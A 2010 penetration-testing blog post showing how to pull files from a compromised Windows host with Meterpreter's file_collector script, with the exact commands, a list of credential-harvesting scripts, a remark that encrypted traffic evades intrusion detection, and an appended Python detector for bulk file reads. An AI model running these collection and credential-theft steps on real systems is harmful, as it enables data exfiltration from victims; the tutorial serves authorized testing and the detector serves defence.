Wednesday 27 October 2010

Post-exploitation: Downloading files from a victim with Metasploit Meterpreter scripts

Imagine you have compromised a target system as part of a penetration test. As part of the pen-test you also need to download some files, both as proof of the compromise and to use the data collected from this system to assist in further exploitation of other systems.

Here I discuss options for how files can be downloaded using the Metasploit Meterpreter console, and using Meterpreter scripts to speed up the process.

I must emphasize that these techniques should only be used for legitimate purposes, either on a test network, or for penetration testing where you have written permission from the data owner.

You are heir to your actions; make sure that everything you do is ethical, and use these techniques for good purposes.

We will skip the exploitation phase in these examples, to focus on the post-exploitation and data collection aspects.

So, we have exploited a system, and find ourselves at a friendly Meterpreter console prompt.




The Meterpreter shell has a lot of neat features, including encryption of all the traffic between our attacking system and the target. This prevents intrusion detection systems (IDS) from intercepting and scanning the data.

Downloading individual files:

From the Meterpreter console it is possible to download individual files using the "download" command, which is pretty straightforward and easy if you only want to download one file.


Meterpreter has a lot of useful inbuilt scripts to make post exploitation tasks such as data collection easier. To view the options, simply type "run" and then space-tab-tab to see the auto-completion options:



Let's look at "run file_collector" first:

In the example below, I wanted to copy all the data from the E: drive of a Windows target, with the exception of a couple of directories that I am not interested in.
(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target system, onto my attacking system ;o)

To view the "run file_collector" options, use "-h":

meterpreter > run file_collector -h
Meterpreter Script for searching and downloading files that
match a specific pattern. First save files to a file, edit and
use that same file to download the choosen files.

OPTIONS:

    -d <opt>  Directory to start search on, search will be recursive.
    -f <opt>  Search blobs separated by a |.
    -h        Help menu.
    -i <opt>  Input file with list of files to download, one per line.
    -l <opt>  Location where to save the files.
    -o <opt>  Output File to save the full path of files found.
    -r        Search subdirectories.


meterpreter >


As you can see in the description, this is a three-stage process. First, we create a file list, then we remove any files we don't want from the list, then we execute the download process.

Creating the file list

run file_collector -r -d e:\\ -f * -o /root/Courses/CforLinux/file.txt

We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking system.

As Meterpreter copies files over an encrypted connection, the data transfer can be slower, so it is best to strip out any unneeded files from the list.





Editing the file list

I don't need some of the directories on the target data drive, so I use grep to remove these, and make a new file "file.lst".

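grep -v -F -e '\DDD' -e '\GCC' -e '\GDB' -e '\MAKE' /root/Courses/CforLinux/file.txt > /root/Courses/CforLinux/file.lst

(The patterns are single-quoted and matched as fixed strings with -F so that the backslash is treated literally; unquoted, the shell would strip it.)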

(I am removing the \DDD \GCC \GDB \MAKE directories, which is not particularly relevant to you, just an example. I am chopping two carrots with one knife here, as this was useful to me at the time ;o)



Downloading the file list

Once we have the edited file list we can simply start the file download process with the following command:

run file_collector -i /root/Courses/CforLinux/file.lst -l /root/Courses/CforLinux/

 



There we go, and that was a very quick way to download all the files I needed.

Other scripts for data collection


There are a whole host of data collection scripts that you can try, including the following:

scraper, credcollect, get_filezilla_creds, dumplinks, get_pidgin_creds, enum_chrome, enum_firefox, enum_putty, winenum

...and if you are feeling adventurous you could create your own scripts. (Maybe a blog for another time)

Mitigations

  • There aren't really any mitigations for these examples. If the exploitation has got this far, it is basically game-over.
  • Deploying a layered security program, using "Defense in depth" can reduce the risk of the initial exploitation.
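
The three-stage collection described above (a recursive listing, then a bulk download of the listed files) means one process on the target reads many distinct files across many directories in a short time. The following is an added example, not part of the original post, of a detector for that pattern over host file-access audit records. The pipe-separated record format, the sample data and the thresholds are assumptions made for illustration, standing in for whatever file-access audit export is available.

```python
import ntpath
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records (not real logs): time|host|process|pid|file read
SAMPLE = r"""
2010-10-27T10:00:01|WS01|winword.exe|2210|C:\Users\amy\report.doc
2010-10-27T10:00:05|WS01|app.exe|1184|E:\DAY01\hello.c
2010-10-27T10:00:06|WS01|app.exe|1184|E:\DAY01\list0101.c
2010-10-27T10:00:08|WS01|app.exe|1184|E:\DAY02\list0201.c
2010-10-27T10:00:09|WS01|app.exe|1184|E:\DAY03\list0301.c
2010-10-27T10:00:11|WS01|app.exe|1184|E:\DAY03\SRC\util.c
2010-10-27T10:00:12|WS01|app.exe|1184|E:\README.TXT
2010-10-27T10:09:30|WS01|winword.exe|2210|C:\Users\amy\notes.doc
"""

def parse(line):
    """Split one record of the assumed format into typed fields."""
    ts, host, proc, pid, path = line.strip().split("|", 4)
    return datetime.fromisoformat(ts), host, proc, int(pid), path

def bulk_read_alerts(lines, window_s=60, min_files=5, min_dirs=3):
    """Flag each (host, pid) that reads at least min_files distinct files
    spread over at least min_dirs directories within one sliding window.
    Records are assumed to arrive in time order."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)          # (host, pid) -> deque of (time, path)
    alerts = {}
    for line in lines:
        if not line.strip():
            continue
        ts, host, proc, pid, path = parse(line)
        key = (host, pid)
        q = recent[key]
        q.append((ts, path.lower()))     # Windows paths are case-insensitive
        while ts - q[0][0] > window:     # drop reads that fell out of the window
            q.popleft()
        files = {p for _, p in q}
        dirs = {ntpath.dirname(p) for p in files}
        if key not in alerts and len(files) >= min_files and len(dirs) >= min_dirs:
            alerts[key] = {"host": host, "process": proc, "pid": pid,
                           "files": len(files), "dirs": len(dirs),
                           "window_start": q[0][0]}
    return list(alerts.values())

if __name__ == "__main__":
    for alert in bulk_read_alerts(SAMPLE.splitlines()):
        print(alert)
```

The thresholds need tuning against normal activity on the host, since backup agents and indexers produce the same read pattern and are better handled with an allow-list of known processes.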

18 comments:

  2. I am not able to run File System Commands on meterpreter; only core commands are shown, please help
